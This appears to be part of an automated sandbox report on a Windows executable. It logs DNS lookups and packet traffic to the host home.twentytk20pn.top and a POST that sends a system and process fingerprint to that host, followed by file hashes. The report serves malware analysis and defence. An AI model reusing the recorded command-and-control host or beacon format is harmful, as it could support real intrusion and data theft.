                                                      Dec 20, 2024 17:05:55.774148941 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:55.774266005 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:55.774276018 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:55.774357080 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:55.774358988 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:55.774426937 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:55.814354897 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:55.814537048 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:55.934400082 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:55.934559107 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:55.978420019 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:55.978524923 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:56.094455957 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.094676018 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:56.178993940 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.179124117 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:56.342633009 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.342972994 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:56.586369038 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.586582899 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:56.590745926 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.590974092 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:56.591027975 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:56.706151009 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.706274033 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:56.710583925 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.710589886 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.710654974 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:56.710699081 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.710750103 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.710766077 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:56.710792065 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:56.710880995 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.710886002 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.710946083 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:56.710963011 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.710992098 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.711013079 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:56.711044073 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:56.711080074 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.711137056 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:56.711142063 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.711205959 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:56.711306095 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.711311102 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.711369991 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:05:56.711376905 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.711383104 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.711425066 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.961478949 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.961497068 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.961582899 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.961637020 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.961698055 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.961707115 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.961725950 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.961822033 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.961913109 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.961930037 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.962290049 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.962351084 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.962455988 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.962466002 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.962508917 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.962521076 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.962591887 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.962610006 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.962742090 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.962800026 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.962901115 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.962909937 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.962999105 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.963017941 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.963073969 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.963092089 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.963151932 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.963248014 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.963258028 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.963270903 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.963423014 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.963434935 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.963481903 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.963515043 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.963587999 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.963598013 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.963640928 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.963650942 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.963721991 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.963776112 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.963843107 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.963851929 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.963946104 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.963954926 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.964062929 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.964075089 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.964086056 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.964097977 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.964176893 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.964188099 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.964411974 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.964422941 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.964432955 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.964446068 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.964457035 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.964468002 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:05:56.964481115 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:06:19.810384989 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:06:19.810739040 CET8049725147.45.113.159192.168.2.6
                                                      Dec 20, 2024 17:06:19.810966015 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:06:19.811012983 CET4972580192.168.2.6147.45.113.159
                                                      Dec 20, 2024 17:06:19.930526018 CET8049725147.45.113.159192.168.2.6
Timestamp | Source IP | Dest IP | Checksum | Code | Type
Dec 20, 2024 17:06:21.253710032 CET | 192.168.2.6 | 1.1.1.1 | c208 | (Port unreachable) | Destination Unreachable
Dec 20, 2024 17:06:22.052020073 CET | 192.168.2.6 | 1.1.1.1 | c208 | (Port unreachable) | Destination Unreachable
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 20, 2024 17:05:18.552548885 CET | 192.168.2.6 | 1.1.1.1 | 0x67d2 | Standard query (0) | httpbin.org | A (IP address) | IN (0x0001) | false
Dec 20, 2024 17:05:18.552608013 CET | 192.168.2.6 | 1.1.1.1 | 0x39c7 | Standard query (0) | httpbin.org | 28 | IN (0x0001) | false
Dec 20, 2024 17:05:21.685854912 CET | 192.168.2.6 | 1.1.1.1 | 0x4d9d | Standard query (0) | home.twentytk20pn.top | A (IP address) | IN (0x0001) | false
Dec 20, 2024 17:05:21.686286926 CET | 192.168.2.6 | 1.1.1.1 | 0xe9fd | Standard query (0) | home.twentytk20pn.top | 28 | IN (0x0001) | false
Dec 20, 2024 17:05:55.272933006 CET | 192.168.2.6 | 1.1.1.1 | 0x6ed1 | Standard query (0) | home.twentytk20pn.top | A (IP address) | IN (0x0001) | false
Dec 20, 2024 17:05:55.272985935 CET | 192.168.2.6 | 1.1.1.1 | 0x10f3 | Standard query (0) | home.twentytk20pn.top | 28 | IN (0x0001) | false
Dec 20, 2024 17:06:19.947207928 CET | 192.168.2.6 | 1.1.1.1 | 0x24d2 | Standard query (0) | home.twentytk20pn.top | A (IP address) | IN (0x0001) | false
Dec 20, 2024 17:06:19.947326899 CET | 192.168.2.6 | 1.1.1.1 | 0x7bdf | Standard query (0) | home.twentytk20pn.top | 28 | IN (0x0001) | false
Dec 20, 2024 17:06:19.947391033 CET | 192.168.2.6 | 1.1.1.1 | 0x24d2 | Standard query (0) | home.twentytk20pn.top | A (IP address) | IN (0x0001) | false
Dec 20, 2024 17:06:20.372026920 CET | 192.168.2.6 | 1.1.1.1 | 0xdbe4 | Standard query (0) | home.twentytk20pn.top | A (IP address) | IN (0x0001) | false
Dec 20, 2024 17:06:20.372117043 CET | 192.168.2.6 | 1.1.1.1 | 0x9990 | Standard query (0) | home.twentytk20pn.top | 28 | IN (0x0001) | false
Dec 20, 2024 17:06:20.372179985 CET | 192.168.2.6 | 1.1.1.1 | 0xdbe4 | Standard query (0) | home.twentytk20pn.top | A (IP address) | IN (0x0001) | false
Dec 20, 2024 17:06:20.759303093 CET | 192.168.2.6 | 1.1.1.1 | 0xac29 | Standard query (0) | home.twentytk20pn.top | A (IP address) | IN (0x0001) | false
Dec 20, 2024 17:06:20.759397030 CET | 192.168.2.6 | 1.1.1.1 | 0xebcc | Standard query (0) | home.twentytk20pn.top | 28 | IN (0x0001) | false
Dec 20, 2024 17:06:20.759463072 CET | 192.168.2.6 | 1.1.1.1 | 0xac29 | Standard query (0) | home.twentytk20pn.top | A (IP address) | IN (0x0001) | false
Dec 20, 2024 17:06:21.115068913 CET | 192.168.2.6 | 1.1.1.1 | 0x427e | Standard query (0) | home.twentytk20pn.top | A (IP address) | IN (0x0001) | false
Dec 20, 2024 17:06:21.115140915 CET | 192.168.2.6 | 1.1.1.1 | 0x2bb4 | Standard query (0) | home.twentytk20pn.top | 28 | IN (0x0001) | false
Dec 20, 2024 17:06:21.115201950 CET | 192.168.2.6 | 1.1.1.1 | 0x427e | Standard query (0) | home.twentytk20pn.top | A (IP address) | IN (0x0001) | false
Dec 20, 2024 17:06:21.535929918 CET | 192.168.2.6 | 1.1.1.1 | 0x1446 | Standard query (0) | home.twentytk20pn.top | A (IP address) | IN (0x0001) | false
Dec 20, 2024 17:06:21.536309004 CET | 192.168.2.6 | 1.1.1.1 | 0x36aa | Standard query (0) | home.twentytk20pn.top | 28 | IN (0x0001) | false
Dec 20, 2024 17:06:21.536426067 CET | 192.168.2.6 | 1.1.1.1 | 0x1446 | Standard query (0) | home.twentytk20pn.top | A (IP address) | IN (0x0001) | false
Dec 20, 2024 17:06:21.908564091 CET | 192.168.2.6 | 1.1.1.1 | 0xe03a | Standard query (0) | home.twentytk20pn.top | A (IP address) | IN (0x0001) | false
Dec 20, 2024 17:06:21.908843994 CET | 192.168.2.6 | 1.1.1.1 | 0x2021 | Standard query (0) | home.twentytk20pn.top | 28 | IN (0x0001) | false
Dec 20, 2024 17:06:21.908910036 CET | 192.168.2.6 | 1.1.1.1 | 0xe03a | Standard query (0) | home.twentytk20pn.top | A (IP address) | IN (0x0001) | false
Dec 20, 2024 17:06:21.908963919 CET | 192.168.2.6 | 1.1.1.1 | 0x2021 | Standard query (0) | home.twentytk20pn.top | 28 | IN (0x0001) | false
Dec 20, 2024 17:06:21.911307096 CET | 192.168.2.6 | 1.1.1.1 | 0xe03a | Standard query (0) | home.twentytk20pn.top | A (IP address) | IN (0x0001) | false
Dec 20, 2024 17:06:21.911392927 CET | 192.168.2.6 | 1.1.1.1 | 0x2021 | Standard query (0) | home.twentytk20pn.top | 28 | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 20, 2024 17:05:18.691819906 CET | 1.1.1.1 | 192.168.2.6 | 0x67d2 | No error (0) | httpbin.org | | 98.85.100.80 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 17:05:18.691819906 CET | 1.1.1.1 | 192.168.2.6 | 0x67d2 | No error (0) | httpbin.org | | 34.226.108.155 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 17:05:22.090008020 CET | 1.1.1.1 | 192.168.2.6 | 0x4d9d | No error (0) | home.twentytk20pn.top | | 147.45.113.159 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 17:05:55.411153078 CET | 1.1.1.1 | 192.168.2.6 | 0x6ed1 | No error (0) | home.twentytk20pn.top | | 147.45.113.159 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 17:06:20.086015940 CET | 1.1.1.1 | 192.168.2.6 | 0x24d2 | No error (0) | home.twentytk20pn.top | | 147.45.113.159 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 17:06:20.086029053 CET | 1.1.1.1 | 192.168.2.6 | 0x24d2 | No error (0) | home.twentytk20pn.top | | 147.45.113.159 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 17:06:20.566458941 CET | 1.1.1.1 | 192.168.2.6 | 0xdbe4 | No error (0) | home.twentytk20pn.top | | 147.45.113.159 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 17:06:20.566469908 CET | 1.1.1.1 | 192.168.2.6 | 0xdbe4 | No error (0) | home.twentytk20pn.top | | 147.45.113.159 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 17:06:20.898525953 CET | 1.1.1.1 | 192.168.2.6 | 0xac29 | No error (0) | home.twentytk20pn.top | | 147.45.113.159 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 17:06:20.898648024 CET | 1.1.1.1 | 192.168.2.6 | 0xac29 | No error (0) | home.twentytk20pn.top | | 147.45.113.159 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 17:06:21.252844095 CET | 1.1.1.1 | 192.168.2.6 | 0x427e | No error (0) | home.twentytk20pn.top | | 147.45.113.159 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 17:06:21.253576994 CET | 1.1.1.1 | 192.168.2.6 | 0x427e | No error (0) | home.twentytk20pn.top | | 147.45.113.159 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 17:06:21.674328089 CET | 1.1.1.1 | 192.168.2.6 | 0x1446 | No error (0) | home.twentytk20pn.top | | 147.45.113.159 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 17:06:21.674341917 CET | 1.1.1.1 | 192.168.2.6 | 0x1446 | No error (0) | home.twentytk20pn.top | | 147.45.113.159 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 17:06:22.051959038 CET | 1.1.1.1 | 192.168.2.6 | 0xe03a | No error (0) | home.twentytk20pn.top | | 147.45.113.159 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 17:06:22.053455114 CET | 1.1.1.1 | 192.168.2.6 | 0xe03a | No error (0) | home.twentytk20pn.top | | 147.45.113.159 | A (IP address) | IN (0x0001) | false
Dec 20, 2024 17:06:22.053478956 CET | 1.1.1.1 | 192.168.2.6 | 0xe03a | No error (0) | home.twentytk20pn.top | | 147.45.113.159 | A (IP address) | IN (0x0001) | false
                                                      • httpbin.org
                                                      • home.twentytk20pn.top
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.6 | 49717 | 147.45.113.159 | 80 | 6216 | C:\Users\user\Desktop\S0O8qbVwLk.exe
Timestamp | Bytes transferred | Direction | Data
Dec 20, 2024 17:05:22.222006083 CET | 12360 | OUT | POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1
                                                      Host: home.twentytk20pn.top
                                                      Accept: */*
                                                      Content-Type: application/json
                                                      Content-Length: 502459
                                                      Data Ascii: { "ip": "8.46.123.189", "current_time": "1734710720", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 560 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 652 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "fontdrvhost.exe", "pid": 788 }, { "name": "svchost.exe", "pid": 868 }, { "name": "svchost.exe", "pid": 928 }, { "name": "dwm.exe", "pid": 996 }, { "name": "svchost.exe", "pid": 436 }, { "name": "svchost.exe", "pid": 376 }, { "name": "svchost.exe", "pid": 60 }, { "name": "svchost.exe", "pid": 9 [TRUNCATED]


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      1 | 192.168.2.6 | 49725 | 147.45.113.159 | 80 | 6216 | C:\Users\user\Desktop\S0O8qbVwLk.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Dec 20, 2024 17:05:55.533757925 CET | 12360 | OUT | POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1
                                                      Host: home.twentytk20pn.top
                                                      Accept: */*
                                                      Content-Type: application/json
                                                      Content-Length: 502459
                                                      Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 31 30 37 32 30 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 [TRUNCATED]
                                                      Data Ascii: { "ip": "8.46.123.189", "current_time": "1734710720", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 560 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 652 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "fontdrvhost.exe", "pid": 788 }, { "name": "svchost.exe", "pid": 868 }, { "name": "svchost.exe", "pid": 928 }, { "name": "dwm.exe", "pid": 996 }, { "name": "svchost.exe", "pid": 436 }, { "name": "svchost.exe", "pid": 376 }, { "name": "svchost.exe", "pid": 60 }, { "name": "svchost.exe", "pid": 9 [TRUNCATED]
                                                      Dec 20, 2024 17:06:19.810384989 CET | 183 | IN | HTTP/1.1 200 OK
                                                      Server: nginx/1.22.1
                                                      Date: Fri, 20 Dec 2024 16:06:19 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Content-Length: 26
                                                      Connection: close
                                                      Data Raw: 35 6a 77 71 53 77 5a 42 42 68 46 4c 34 5a 43 7a 31 37 33 34 37 31 30 37 37 38
                                                      Data Ascii: 5jwqSwZBBhFL4ZCz1734710778


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      0 | 192.168.2.6 | 49716 | 98.85.100.80 | 443 | 6216 | C:\Users\user\Desktop\S0O8qbVwLk.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2024-12-20 16:05:20 UTC | 52 | OUT | GET /ip HTTP/1.1
                                                      Host: httpbin.org
                                                      Accept: */*
                                                      2024-12-20 16:05:20 UTC | 224 | IN | HTTP/1.1 200 OK
                                                      Date: Fri, 20 Dec 2024 16:05:20 GMT
                                                      Content-Type: application/json
                                                      Content-Length: 31
                                                      Connection: close
                                                      Server: gunicorn/19.9.0
                                                      Access-Control-Allow-Origin: *
                                                      Access-Control-Allow-Credentials: true
                                                      2024-12-20 16:05:20 UTC | 31 | IN | Data Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                      Data Ascii: { "origin": "8.46.123.189"}



                                                      Target ID:0
                                                      Start time:11:05:14
                                                      Start date:20/12/2024
                                                      Path:C:\Users\user\Desktop\S0O8qbVwLk.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\S0O8qbVwLk.exe"
                                                      Imagebase:0x770000
                                                      File size:4'453'888 bytes
                                                      MD5 hash:308B5CEF77C672F677D2245307116688
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_3_13d5000_S0O8qbVwLk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fd34bb739576f09614c4b08cdadb4ae835393ae734d38bb63f9083bed18ed6e4
                                                        • Instruction ID: 7fe30a94676707f26864798ef5bf12f86f07006139d784759760631d53459df0
                                                        • Opcode Fuzzy Hash: fd34bb739576f09614c4b08cdadb4ae835393ae734d38bb63f9083bed18ed6e4
                                                        • Instruction Fuzzy Hash: DF81EA9280EBC25FD72787745CB5691BFB15E23114B4F4AEBD4D0CA0F3E219591AD322
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000003.2949226344.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, Offset: 013D5000, based on PE: false
                                                        • Associated: 00000000.00000003.2948769870.00000000013D5000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_3_13d5000_S0O8qbVwLk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fd34bb739576f09614c4b08cdadb4ae835393ae734d38bb63f9083bed18ed6e4
                                                        • Instruction ID: 7fe30a94676707f26864798ef5bf12f86f07006139d784759760631d53459df0
                                                        • Opcode Fuzzy Hash: fd34bb739576f09614c4b08cdadb4ae835393ae734d38bb63f9083bed18ed6e4
                                                        • Instruction Fuzzy Hash: DF81EA9280EBC25FD72787745CB5691BFB15E23114B4F4AEBD4D0CA0F3E219591AD322
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000003.2949226344.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, Offset: 013D9000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_3_13d5000_S0O8qbVwLk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fd34bb739576f09614c4b08cdadb4ae835393ae734d38bb63f9083bed18ed6e4
                                                        • Instruction ID: 7fe30a94676707f26864798ef5bf12f86f07006139d784759760631d53459df0
                                                        • Opcode Fuzzy Hash: fd34bb739576f09614c4b08cdadb4ae835393ae734d38bb63f9083bed18ed6e4
                                                        • Instruction Fuzzy Hash: DF81EA9280EBC25FD72787745CB5691BFB15E23114B4F4AEBD4D0CA0F3E219591AD322
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000003.2949226344.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, Offset: 013D8000, based on PE: false
                                                        • Associated: 00000000.00000003.2949064428.00000000013D8000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_3_13d5000_S0O8qbVwLk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 32c7df321e9203b4078eb1ded6b3c430e84f9014209e5cdc51c68d6105d8b45e
                                                        • Instruction ID: bed9b0bed47aa4b4e6d03e7343a8de8915fe1ff965786e56ca0e965c4fa60421
                                                        • Opcode Fuzzy Hash: 32c7df321e9203b4078eb1ded6b3c430e84f9014209e5cdc51c68d6105d8b45e
                                                        • Instruction Fuzzy Hash: 3461C89680E7C25FD72347744CB96917FB18F27224B4F46EB94E0CA5F3E259180AD322
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000003.2949226344.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, Offset: 013D9000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_3_13d5000_S0O8qbVwLk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 32c7df321e9203b4078eb1ded6b3c430e84f9014209e5cdc51c68d6105d8b45e
                                                        • Instruction ID: bed9b0bed47aa4b4e6d03e7343a8de8915fe1ff965786e56ca0e965c4fa60421
                                                        • Opcode Fuzzy Hash: 32c7df321e9203b4078eb1ded6b3c430e84f9014209e5cdc51c68d6105d8b45e
                                                        • Instruction Fuzzy Hash: 3461C89680E7C25FD72347744CB96917FB18F27224B4F46EB94E0CA5F3E259180AD322
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000003.2949226344.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, Offset: 013D5000, based on PE: false
                                                        • Associated: 00000000.00000003.2948769870.00000000013D5000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_3_13d5000_S0O8qbVwLk.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
